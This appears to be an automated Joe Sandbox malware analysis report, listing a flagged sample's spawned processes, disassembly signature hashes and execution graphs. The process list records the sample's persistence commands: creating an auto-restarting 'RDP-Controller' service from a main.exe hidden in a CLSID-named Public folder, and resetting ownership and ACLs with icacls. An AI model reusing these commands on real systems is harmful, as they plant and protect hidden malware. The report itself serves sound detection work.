  • Detection: 100%, Joe Sandbox ML
  • Detection: 19%, ReversingLabs
Reputation:low
Has exited:true

Target ID:13
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Imagebase:0x7ff6a4e50000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:14
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc.exe stop RDP-Controller
Imagebase:0x7ff734ee0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:16
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Imagebase:0x7ff734ee0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Imagebase:0x7ff734ee0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc.exe start RDP-Controller
Imagebase:0x7ff734ee0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:11:46:27
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:11:46:27
Start date:24/09/2024
Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):false
Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:0x7ff6ef650000
File size:89'088 bytes
MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:11:46:28
Start date:24/09/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Imagebase:0x7ff670060000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:11:46:28
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:11:46:28
Start date:24/09/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Imagebase:0x7ff670060000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:11:46:28
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Reset < >
    APIs
    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9A057
    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9A05D
    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9A063
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID:
    • API String ID: 3668304517-0
    • Opcode ID: 5cd11c8f57aefbf4e978efb23c97d87aadef05c6180bfc30900a697b6c4ed259
    • Instruction ID: 47a8011b9baca9e957fdbe00d26b5bf9dfd56ce943fe01651778f1a281f401d1
    • Opcode Fuzzy Hash: 5cd11c8f57aefbf4e978efb23c97d87aadef05c6180bfc30900a697b6c4ed259
    • Instruction Fuzzy Hash: 82B18070918A4C8FEB54EF28C884A9EB7E1FFA9394F60571EE54AD3164DB709481CB41
    APIs
    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9D0EF
    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02F9D0F5
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID:
    • API String ID: 3668304517-0
    • Opcode ID: 94a887f789ff5ddcb093f0301a886daf5772482d6b96eb020e294c1a36146a2d
    • Instruction ID: dcecd1a22865e6893c6243a004f09c5fca52bbae17441cc31e08f7cf3272cd21
    • Opcode Fuzzy Hash: 94a887f789ff5ddcb093f0301a886daf5772482d6b96eb020e294c1a36146a2d
    • Instruction Fuzzy Hash: 4AA19071928B4C8BEB54EF2CC8846EE77E2FB99390F50471AE58AC3164DB309581CB81
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6d789b65366662fea0c61f3f853abc17da2fc7c830dcada29da3dc287b9a8088
    • Instruction ID: 54dadb8c6306fbfb6263cc3088dafa51ed08ca6200f34381fe6ea2c5dec0dac4
    • Opcode Fuzzy Hash: 6d789b65366662fea0c61f3f853abc17da2fc7c830dcada29da3dc287b9a8088
    • Instruction Fuzzy Hash: A7A1A331A18E0C8FDF58EF2CC485AADB7E1FBA9354F00465AD54AD7150DA30E986CB85
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: _clrfp
    • String ID:
    • API String ID: 3618594692-0
    • Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
    • Instruction ID: 97233797a5aaf65522aeac158ba121f320760d361d626a96a2fc6dbd2fec569d
    • Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
    • Instruction Fuzzy Hash: D8B18AB1610B4D8FDB98DF1CC89AB6677E0FF49348F188599E859CB661C335E852CB01
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e702905e188292895ab496ef014bc760e695e081b65edb76e1e23856c507ca6b
    • Instruction ID: af240bd9ade00c423d80f3a0b9e13cd6cc084c0ac731a66ba183370069a924eb
    • Opcode Fuzzy Hash: e702905e188292895ab496ef014bc760e695e081b65edb76e1e23856c507ca6b
    • Instruction Fuzzy Hash: 95E19531928B8C8BDB49DF28C8945BAB3E1FFA9340F50571EE586D3154EB74E684CB81
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
    • Instruction ID: a3554e579c0a96457e7f67de533db03c79da4d5bbc406b8508169e21e9d48f5c
    • Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
    • Instruction Fuzzy Hash: DD6116B0E1CB5C4FDB28FF689C5956EBBE1EB84B50F04465FE586C3155DB30A8428AC2
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
    • Instruction ID: fa07497f0f0fceb977695c2690035f394bc0520c4bb3ae46eb7e02e20d5c0366
    • Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
    • Instruction Fuzzy Hash: 4D512432718E0C8F8B0CDE6CD8A867573D2E7AC314315832EE50ED7265DA70E8468781
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
    • Instruction ID: f1225bdbb7c3d8146eb9cbef5154bfbffc05a0fd55b158ad910b18772e530a96
    • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
    • Instruction Fuzzy Hash: ED219831B116054BE70CCE2EC899575B3D6F7D9205B54C67DE15BCB357C93658038A48
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
    • Instruction ID: 880e33488e1a229cfef6b273fb01b96636e3d486ccacc26ba29b63c651d92901
    • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
    • Instruction Fuzzy Hash: 4211E1723108048FEB4CCF7DCD8966973D6EB89304B58C2BCE61ACB2AAD6358903C744
    APIs
    • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02FA0DBF
      • Part of subcall function 02FA3122: __GetUnwindTryBlock.LIBCMT ref: 02FA3165
      • Part of subcall function 02FA3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02FA318A
    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02FA0E97
    • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02FA10E5
    • std::bad_alloc::bad_alloc.LIBCMT ref: 02FA11F2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
    • String ID: csm$csm$csm
    • API String ID: 849930591-393685449
    • Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
    • Instruction ID: d6b7d180f78bf54f75052171eb29356a25cef84d206d3f8b026c0bec0508665d
    • Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
    • Instruction Fuzzy Hash: 5BE1E370918B488FEF24EF68D8A57AE77E1FB98394F50021ED589D7211DB34E481CB82
    APIs
    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02FA13D0
    • std::bad_alloc::bad_alloc.LIBCMT ref: 02FA16F9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
    • String ID: csm$csm$csm
    • API String ID: 3523768491-393685449
    • Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
    • Instruction ID: 7e148f22ebed8aedb1457cd0190fb3b7a60939b6efa33d96882996453d72194c
    • Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
    • Instruction Fuzzy Hash: 4BE10770918B488FDB14EF28C8A46AE77E1FF59394F15025ED589C7652DB30E482CF82
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
    • Instruction ID: 4e5f5aecba5e2c40a69d38534e01cbac7dd7875701361e69b91bf2a0ca5471f9
    • Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
    • Instruction Fuzzy Hash: 69C1D071918E0E8FAB29AF1CA460775B3D1FF98794B54462EC68AC3255EF70D881CB80
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID:
    • String ID: $($2$H$P!`$`
    • API String ID: 0-2682688576
    • Opcode ID: f3333863e6a630afb4b2bbe1aa5c2ac1bf4f02da6f8d2e8a3d59ac9fb3e9e479
    • Instruction ID: 680d62f8be82c68abda8f51f05ac1394f207ad5207c5145a65557a42f2e7ce46
    • Opcode Fuzzy Hash: f3333863e6a630afb4b2bbe1aa5c2ac1bf4f02da6f8d2e8a3d59ac9fb3e9e479
    • Instruction Fuzzy Hash: FCC1F5B09087888FD7A4EF18C48879ABBE1FB99314F504A6ED8CDCB215DB705589CF46
    APIs
    • _CallSETranslator.LIBVCRUNTIME ref: 02FA1A61
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: CallTranslator
    • String ID: MOC$RCC
    • API String ID: 3163161869-2084237596
    • Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
    • Instruction ID: 592556a8f2131a2557d0adc41d92165d6d57ddb5659268d9be57225fc82deea0
    • Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
    • Instruction Fuzzy Hash: 0AA1D570918B488FDB18EF6CC895AADBBF1FB98344F14465EE58AC7121DB34E581CB81
    APIs
    • __except_validate_context_record.LIBVCRUNTIME ref: 02FA0095
    • _IsNonwritableInCurrentImage.LIBCMT ref: 02FA012C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: CurrentImageNonwritable__except_validate_context_record
    • String ID: csm
    • API String ID: 3242871069-1018135373
    • Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
    • Instruction ID: 482a78a91f1ac04973a5a85449cb95df4af7f56e20a76791db32b5dab8261d52
    • Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
    • Instruction Fuzzy Hash: CD61D670718B088BDF28EE1CE8A5B7473D5FB54394F10416DEA8AC3256EF34E8518B85
    APIs
    • _CallSETranslator.LIBVCRUNTIME ref: 02FA17E1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: CallTranslator
    • String ID: MOC$RCC
    • API String ID: 3163161869-2084237596
    • Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
    • Instruction ID: c3b80d0d5fa7dc0119d0ee2d606db49c4d8a75d26e7e3954128fa0a15e4ecaf6
    • Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
    • Instruction Fuzzy Hash: B671BD70918B488FDB28EF1CC456BAAB7E0FB99344F444A5EE58DC3211DB74E581CB82
    APIs
    • __except_validate_context_record.LIBVCRUNTIME ref: 02FA28A0
    • _CreateFrameInfo.LIBVCRUNTIME ref: 02FA28C9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1732668755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_2f90000_file.jbxd
    Similarity
    • API ID: CreateFrameInfo__except_validate_context_record
    • String ID: csm
    • API String ID: 2558813199-1018135373
    • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
    • Instruction ID: 0b1daf2b00b2293c4f46cc3cfbcadeb52e519b6117a829f38135a8d86cacf9f8
    • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
    • Instruction Fuzzy Hash: 275143B0618B448FD764EF28D4A576977E2FB8D391F10065EE589C7621DB30E441CF86

    Execution Graph

    Execution Coverage:59.2%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0%
    Total number of Nodes:11
    Total number of Limit Nodes:1
    execution_graph 89 2e50650 90 2e50665 89->90 95 2e50620 VirtualAlloc 90->95 92 2e506d0 96 2e501b0 VirtualAlloc 92->96 95->92 97 2e5023b VirtualProtect 96->97 99 2e50321 VirtualFree 97->99 102 2e5030c 97->102 100 2e50347 VirtualFree VirtualAlloc 99->100 100->102 101 2e50531 102->101 103 2e504f9 VirtualProtect 102->103 103->102

    Callgraph

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.2976788650.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_2e50000_file.jbxd
    Similarity
    • API ID: Virtual$AllocFreeProtect
    • String ID:
    • API String ID: 267585107-0
    • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
    • Instruction ID: 2a2e062aa948e3b74c15e76abbff9e5eb8e303faed4d188265df2c8eeb0229fc
    • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
    • Instruction Fuzzy Hash: 85C1DA3421CA488FD784EF5CD498B6AB7E1FB98305F51585DF48AC7261DBB4E881CB02

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 34 2e50620-2e50644 VirtualAlloc
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.2976788650.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_2e50000_file.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
    • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
    • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
    • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

    Execution Graph

    Execution Coverage:6.3%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:8%
    Total number of Nodes:1734
    Total number of Limit Nodes:8
    execution_graph 10387 7ff73afc0721 DeleteCriticalSection 10728 7ff73afb3222 10729 7ff73afb3230 WaitForSingleObject 10728->10729 10730 7ff73afb325c 10728->10730 10731 7ff73afb328c GetLastError 10729->10731 10734 7ff73afb3240 10729->10734 10732 7ff73afb14e2 12 API calls 10730->10732 10733 7ff73afb14e2 12 API calls 10731->10733 10732->10734 10733->10734 10388 7ff73afbff1f GetModuleHandleW GetProcAddress 10389 7ff73afbff73 10388->10389 10390 7ff73afbff4c LoadLibraryW GetProcAddress 10388->10390 10390->10389 10735 7ff73afbf626 10736 7ff73afbf65d 10735->10736 10737 7ff73afbf63b DeleteCriticalSection 10735->10737 10737->10736 11205 7ff73afb5923 11206 7ff73afb5936 11205->11206 11207 7ff73afb59d4 11205->11207 11209 7ff73afb593f CreateFileA 11206->11209 11210 7ff73afb5a04 11206->11210 11208 7ff73afb14e2 12 API calls 11207->11208 11215 7ff73afb59b4 11208->11215 11212 7ff73afb5a34 GetLastError 11209->11212 11213 7ff73afb597c GetFileSize 11209->11213 11211 7ff73afb14e2 12 API calls 11210->11211 11211->11215 11217 7ff73afb599b 11212->11217 11214 7ff73afb5afa GetLastError 11213->11214 11213->11217 11214->11217 11216 7ff73afb59ab CloseHandle 11216->11215 11217->11215 11217->11216 10738 7ff73afb1a19 10739 7ff73afb1b02 10738->10739 10740 7ff73afb1a32 10738->10740 10743 7ff73afb14e2 12 API calls 10739->10743 10741 7ff73afb1b2d 10740->10741 10742 7ff73afb1a3b FindResourceA 10740->10742 10746 7ff73afb14e2 12 API calls 10741->10746 10744 7ff73afb1b58 GetLastError 10742->10744 10745 7ff73afb1a58 LoadResource 10742->10745 10749 7ff73afb1af2 10743->10749 10750 7ff73afb14e2 12 API calls 10744->10750 10747 7ff73afb1a70 10745->10747 10748 7ff73afb1b86 GetLastError GetLastError 10745->10748 10746->10749 10753 7ff73afb14e2 12 API calls 10747->10753 10752 7ff73afb14e2 12 API calls 10748->10752 10751 7ff73afb1b79 10750->10751 10751->10748 10751->10749 10752->10749 10753->10749 10391 7ff73afb131a 10392 7ff73afb1131 167 API calls 10391->10392 10393 7ff73afb132e 10392->10393 10754 7ff73afc0619 MultiByteToWideChar 9804 7ff73afb181b 9805 7ff73afb17b9 9804->9805 9806 7ff73afb14e2 12 API calls 9805->9806 9807 7ff73afb17d6 9806->9807 9808 7ff73afb341c 9809 7ff73afb34ad 9808->9809 9810 7ff73afb342e GetExitCodeProcess 9808->9810 9811 7ff73afb14e2 12 API calls 9809->9811 9812 7ff73afb350f GetLastError 9810->9812 9813 7ff73afb3444 9810->9813 9818 7ff73afb34d6 9811->9818 9815 7ff73afb14e2 12 API calls 9812->9815 9814 7ff73afb3452 WaitForSingleObject GetExitCodeProcess 9813->9814 9813->9818 9819 7ff73afb35f9 TerminateProcess 9813->9819 9816 7ff73afb36f1 GetLastError 9814->9816 9817 7ff73afb3476 9814->9817 9815->9818 9820 7ff73afb14e2 12 API calls 9816->9820 9830 7ff73afb33c0 9817->9830 9821 7ff73afb37ac 9818->9821 9825 7ff73afb14e2 12 API calls 9818->9825 9819->9814 9824 7ff73afb360a GetLastError 9819->9824 9820->9818 9827 7ff73afb14e2 12 API calls 9824->9827 9829 7ff73afb34ab 9825->9829 9826 7ff73afb3484 9828 7ff73afb14e2 12 API calls 9826->9828 9827->9813 9828->9829 9831 7ff73afb33ce CloseHandle CloseHandle 9830->9831 9832 7ff73afb33ec 9830->9832 9834 7ff73afb33e5 9831->9834 9833 7ff73afb14e2 12 API calls 9832->9833 9833->9834 9834->9818 9834->9826 11218 7ff73afbc51b 11219 7ff73afbc52d 11218->11219 11220 7ff73afbbbb4 fputc 11219->11220 11222 7ff73afbc382 11220->11222 11221 7ff73afbca67 11222->11221 11223 7ff73afbb3e7 fputc 11222->11223 11224 7ff73afbb593 strlen 11222->11224 11225 7ff73afbc475 wcslen 11222->11225 11226 7ff73afbb420 5 API calls 11222->11226 11223->11222 11224->11222 11225->11222 11226->11222 10755 7ff73afbc631 10758 7ff73afbc64d 10755->10758 10757 7ff73afbc6c3 10767 7ff73afbb5da 10757->10767 10758->10757 10759 7ff73afbc6c8 10758->10759 10771 7ff73afbbdaf 10759->10771 10761 7ff73afbca67 10762 7ff73afbb3e7 fputc 10765 7ff73afbc382 10762->10765 10763 7ff73afbb593 strlen 10763->10765 10764 7ff73afbc475 wcslen 10764->10765 10765->10761 10765->10762 10765->10763 10765->10764 10766 7ff73afbb420 5 API calls 10765->10766 10766->10765 10768 7ff73afbb5f0 10767->10768 10769 7ff73afbb4fe fputc 10768->10769 10770 7ff73afbb646 10769->10770 10770->10765 10775 7ff73afbbdc6 10771->10775 10772 7ff73afbb3e7 fputc 10774 7ff73afbbf9d 10772->10774 10773 7ff73afbbf5e 10773->10772 10773->10774 10776 7ff73afbb3e7 fputc 10774->10776 10775->10773 10779 7ff73afbb3e7 fputc 10775->10779 10777 7ff73afbbfaa 10776->10777 10778 7ff73afbb3e7 fputc 10777->10778 10781 7ff73afbbfbb 10778->10781 10779->10775 10780 7ff73afbc008 10784 7ff73afbc054 10780->10784 10787 7ff73afbb3e7 fputc 10780->10787 10782 7ff73afbb3e7 fputc 10781->10782 10783 7ff73afbbfc1 10781->10783 10782->10781 10783->10780 10786 7ff73afbb3e7 fputc 10783->10786 10789 7ff73afbb420 5 API calls 10783->10789 10791 7ff73afbb64c 10783->10791 10788 7ff73afbb3e7 fputc 10784->10788 10786->10783 10787->10780 10790 7ff73afbc068 10788->10790 10789->10783 10794 7ff73afbb666 10791->10794 10797 7ff73afbb68f 10791->10797 10792 7ff73afbb706 10795 7ff73afbb3e7 fputc 10792->10795 10793 7ff73afbb6a7 10798 7ff73afc0047 4 API calls 10793->10798 10796 7ff73afc026c 6 API calls 10794->10796 10804 